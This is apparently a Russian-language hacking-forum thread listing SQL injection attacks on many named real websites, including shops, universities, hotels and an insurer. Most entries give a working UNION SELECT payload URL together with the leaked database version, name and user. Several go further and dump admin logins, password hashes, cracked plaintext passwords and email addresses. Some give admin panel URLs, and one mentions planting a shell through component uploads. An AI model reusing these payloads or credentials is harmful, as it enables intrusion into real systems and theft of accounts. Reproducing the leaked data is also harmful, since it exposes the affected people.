SQL Инъекции

http://www.raft.ro/produs.php?idprodus=17720+UNION+SELECT+1,AES_DECRYPT(AES_ENCRYPT(CONCAT_WS(0x3a,Version(),Database(),User()),0x71),0x71),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+LIMIT+1,1




Database Version: 4.0.23-nt
Database name: raft
User name: raftdb@localhost

http://www.raft.ro/produs.php?idprodus=17720+UNION+SELECT+1,AES_DECRYPT(AES_ENCRYPT(CONCAT_WS(0x3a,userid,email,username,password),0x71),0x71),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+users+LIMIT+1,1

 

PageRank = 6

Database Version: 5.0.32-Debian_7etch6-log
Database name: worldsbk
User name: [email protected]

root : *D6D90523CDBE293EFE62145B33F293D273308551

Database Version: 5.0.45
Database name: osi
User name: osi@localhost

USERID : USERNAME : PASSWORD : TYPE : EMAIL

:1:briansuk:b0544c87bad417ec3cbbdb25ef4705c4:A:[email protected] хэш MD5:b0544c87bad417ec3cbbdb25ef4705c4 : brianbrian
:6:afriant1:964e3f989bc8389d161320484dc3ef31:V:[email protected]
:5:1photo2:1cd760c843449a0ecb9aa20afacbeff7:V:[email protected] хэш MD5:1cd760c843449a0ecb9aa20afacbeff7 : 2photo3
:3:briantest:b45f850374b26692270d10fb090ad09d:V:[email protected]
:2:jgroden1:c064a79ee9f78586511a548e784b5a2d:A:[email protected] хэш MD5 : c064a79ee9f78586511a548e784b5a2d : bluejays


Админка


http://ww2.jhu.edu/~osi/administrator/


Шелл льём через загрузку компонентов.Хотя на любителя.)

Savemode OFF

 

http://ciupercarii.ro/index.php?section=vanzari_details&id_prod=-14+UNION+SELECT+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6




Database Version: 5.0.67-community
Database name: ciuperca_ciupercarie
User name: ciuperca_ciuperc@localhost



http://ciupercarii.ro/login

admin:admin

 

PageRang - 7

Code:

http://www.disco.bg/designs/classic2_bg.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),database( ),user()),4,5,6,7,8,9,10,11 ,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71--

Database Version :5.0.67-community-log
Database name : discobg_disco
User name : discobg_site2@localhost

в таблицах нахожу клиентов:

Code:

http://www.disco.bg/designs/classic2_bg.php?id=-1+union+select+1,2,table _name,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71+from+information _schema.tables+limit+31,1--

В колонах узнаю:

Code:

http://www.disco.bg/designs/classic2_bg.php?id=9999999+union+select+1,2,COLUMN_NAME,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71+from+INFORMATION_SCHEMA.COLUMNS+PROFILING+WHERE+TABLE_NAME+ LIKE+char(112,104,112,97,100,115,95,99,108,105,101,110,116,115) +limit+6,1--

Code:

clientusername
clientpassword

но вот только почему-то он мне их не хочет выводить из phpads_clients ... напишите в личку если у кого получиться вывести все

 

http://www.peruvision.ro/inc/pag/produse/produs_detalii.php?tabela=catp_1_cat_1_subcat_1&id=-8+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,version(),database(),user()),10,11,12/*&l=ro



Version : 5.0.18-log
databse : peruvisionro_1
User : [email protected].

 

http://www.bestellauto.de/index.php?who=999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,version(),71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160,161,162,163,164,165,166,167,168,169,170,171,172,173,174,175,176,177,178,179,180,181,182,183,184,185,186,187,188,189,190,191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206,207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222,223,224,225,226,227,228,229,230,231,232,233,234,235,236,237,238,239,240,241,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,261,262,263,264,265,266,267,268,269,270,271,272,273,274,275,276,277,278,279,280,281,282,283,284,285,286,287,288,289,290,291,292,293,294,295,296,297,298,299,300,301,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,336,337,338,339,340,341,342,343,343,345,346,347,348,349,350,351,352,353,354,355,356,357,358,359,360,361,362,363,364,365,366,367,368,369,370,371,372,373,374,375,376,377,378,379,380,381,382,383,384,385,386,387,388,389,390,391,392,393,394,395,396,397,398,399,400,401,402,403,404,405,406,407,408,409,410,411,412,413,414,415,416,417,418,419--

4.0.24_Debian-10sarge3-log


ЫЫ я псих

 

Какая то онлайн игра...
www.camelotherald.com
PR:4

Code:

http://www.camelotherald.com/news/news_article.php?storyid=-1+union+select+1,2,3,convert(concat_ws(0x3a,version(),user(),database())+using+latin1),5,6,7,8,9,10,11,12,13--

верия/юзер/бд:

Code:

4.1.10-standard:[email protected]:herald

--------------------------------------------------------------------
www.maryland.com
PR:6

Code:

http://www.maryland.com/articles/article.php?a_id=-99999+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34--

верия/юзер/бд:

Code:

4.0.24-standard-log:cms@localhost:cms

---------------------------------------------------------------------
www.cloudynights.com
PR:6

Code:

http://www.cloudynights.com/item.php?item_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,convert(concat_ws(0x3a,version(),user(),database())+using+latin1),13,14,15,16,17,18,19,20,21,22,23--

верия/юзер/бд:

Code:

4.1.14-log:[email protected]:asaint_cloudynights

----------------------------------------------------------------------
The End!

 

http://www.arb.ro/evenimente.php?id=-6+UNION+SELECT+1,AES_DECRYPT(AES_ENCRYPT(CONCAT_WS(0x3a,Version(),Database(),User()),0x71),0x71),3,4,5,6,7,8,9--%20&c=25-noiembrie-2008-/-Forum-National-SEPA




Database Version: 5.0.18-log
Database name: arbro
User name: [email protected].

 

Riverside hotel, hotels in Ross on Wye, Ross on Wye hotel

Code:

http://www.wiltoncourthotel.com/page.php?id=-16+union+select+1,2,3,4,5,6,concat(version(),0x3a,database(),0x3a,user()),8,9,10,11,12,13,14,15,16,17,18,19--

user(): wiltonnew@localhost
database(): wiltonnew
version(): 4.1.19

PR=3

есть таблица admin

Code:

http://www.wiltoncourthotel.com/page.php?id=-16+union+select+1,2,3,4,5,6,password,8,9,10,11,12,13,14,15,16,17,18,19+from+admin--

password: admin
логин не нашёл

Astraware: Games and applications for Palm OS and Windows Mobile Smartphones and PDAs

Code:

http://www.astraware.com/support/search.php?section=-10+union+select+concat(version(),0x3a,database(),0x3a,user())--

user(): website@localhost
database(): astraware3
version(): 4.1.21-max

PR=6

тИЦ=120



Best Hand Made Paper Product

Code:

http://thelotushmp.com/pages/product.php?id=-16+union+select+1,2,3,concat(version(),0x3a,database(),0x3a,user()),5,6,7,8--

user(): thelot_user@localhost
database(): thelot_lotus
version(): 4.1.22-standard

 

Code:

http://girlsector.com/foto_pr.php?id=-1+union+select+1,2,concat(id,0x3a,login,0x3a,pass)+from+gallery_admin+limit+0,1--

логин/пасс:

Code:

bolt:f07ad2552c86bfd4d2396c0114f785ea

---------------------------------------------------------------------------
The End!

 

idg.bg - PR 7

Code:

http://events.idg.bg/?call=USE~events;&id=3+union+select+1,concat_ ws(0x3a,version(),database( ),user()),3,4--

Database Version : 4.1.22-log
Database name : events
User name : spiridon@localhost

админы:

Code:

http://events.idg.bg/?call=USE~events;&id=3+union+select+1,concat_ ws(0x3a ,user,password),3,4+from+ mysql.user--

Code:

root:*A3D00BFBECA25837E7D8C87895FF81D1ABB20C93
spiridon:6294f8ca11192704
webadmin2:5ae1cdf626a45787
stormdevil:*818844DA62BBAC1C12CF2F960F24FA392A543CA3 
cacti:6c9dbb641fab2064

 

http://www.rep3.ro/view_event.php?id=-22+UNION+SELECT+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7/*



Database Version: 5.0.22-Debian_0ubuntu6.06.11-log
Database name: ds_rep3
User name: rep3@localhost

 

Code:

http://noc.teilam.gr/filemgmt/singlefile.php?lid=-2+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16/*

5.0.32-Debian_7etch8-log

Code:

http://noc.teilam.gr/filemgmt/singlefile.php?lid=-2+union+select+1,2,concat(passwd,username),4,5,6,7,8,9,10,11,12,13,14,15,16+from+gl_users/*

8b2ecafccebcd0c49f4d1189c0a283f5:Admin

Code:

http://noc.teilam.gr/admin/moderation.php

админка

 

PR - 5

Code:

http://www.generali.bg/main/en/life_insurance_investment_fund.php?id=-1+union+select+1,concat _ws(0x3a,version( ),database(),user()),3,4,5,6,7--

Database Version : 4.1.22-standard-log
Database name : generali_site
User name : generali_general@localhost

------------------------------------------#

PR - 4

Code:

http://voob.ru/index.php?division_id=-1+union+select+1,concat_ w s(0x3a,version(),database(),user()),3,4,5,6--

Database Version : 5.0.45
Database name : wwwvoobru
User name : voob@localhost

------------------------------------------#

PR - 4

Code:

http://rosstok.ru/newspubl.php?id_news=-1+union+select+1,2,concat_ ws(0x3a,version(),database(),user()),4,5,6,7--

Database Version : 5.0.41-log
Database name : rosstok
User name : [email protected]

юзвери:

Code:

http://rosstok.ru/newspubl.php?id_news=-1+union+select+1,2,concat_ ws(0x3a,id_user,nik,passw,email),4,5,6,7+from+user--

их 3029 чела ... выводятся сразу все без лимита

 

Code:

http://www.mosmedia.com.tr/cinar/ilkogretim/icerik.php?id=65+union+select+1,2,3,table_name,5,column_name,7,8,9,1+from+information_schema.columns+limit+193,1

PS: limit+193,1уже не верил что она вообще там есть)

AdminUsername: peterkay
AdminPassword: peterkay

 

(Все таблицы)

Code:

http://real-renta.ru/all.php?type=1%20union%20select%201,2,3,4,5,6,7,8,9,table_name,11%20from%20information_schema.tables--

Версия 5...

 

http://www.arctic-adventure.dk/page.php?id=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6/*

 

Colocation | Broadband Wireless | Dedicated Servers | DocSTAR | DSL | Web Hosting | Web Design & Development - Infinity Internet

Code:

http://www.iinet.com/support/answer.php?id=-17'+union+select+1,2,concat(user(),0x3a,database(),0x3a,version()),4,5,6,7,8,9,10,11/*

user(): [email protected]
database(): iinetcom
version(): 4.0.25

PR=5
тИЦ=250

 

Посетите Кэмбридж =) Pr 6

http://visitcambridge.org

http://www.visitcambridge.org/unique.php?id=-3+union%20select%201,2,3

Database Version: 5.0.22
Database name: visitcambridge
User name: visitcambridge@localhost

Логинка : www.visitcambridge.org/cms

frankiem::::happyfeet::::[email protected]

 

www.atlantic-university.org

Code:

https://www.atlantic-university.org/home.php?CopyID=-111+union+select+1,2,3,4,5,login,pwd+from+users/*

4.1.25-Debian_mt1-log

одменка - https://www.atlantic-university.org/login/
webmaster:n0m3@+p1@


kennedy.byu.edu

Code:

http://kennedy.byu.edu/isp/print.php?id=-219'+union+select+1,2,3,4,5,cast(concat(version(),0x2f,user())+as+binary),7,8/*

4.1.7-nt


www.clarkson.edu

Code:

http://www.clarkson.edu/news/print.php?id=-1877'+union+select+table_name,null+from+information_schema.tables+where+table_name+not+in+('body','comments','D99_Tmp','Headlines','Headlines$','News_release','Paragraphs','Paragraphs$','Sysdiagrams','User12')--+

Microsoft SQL Server 2005 - 9.00.3077.00 (Intel X86) Dec 17 2008 15:19:45 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition On Windows NT 5.2 (Build 3790: Service Pack 2)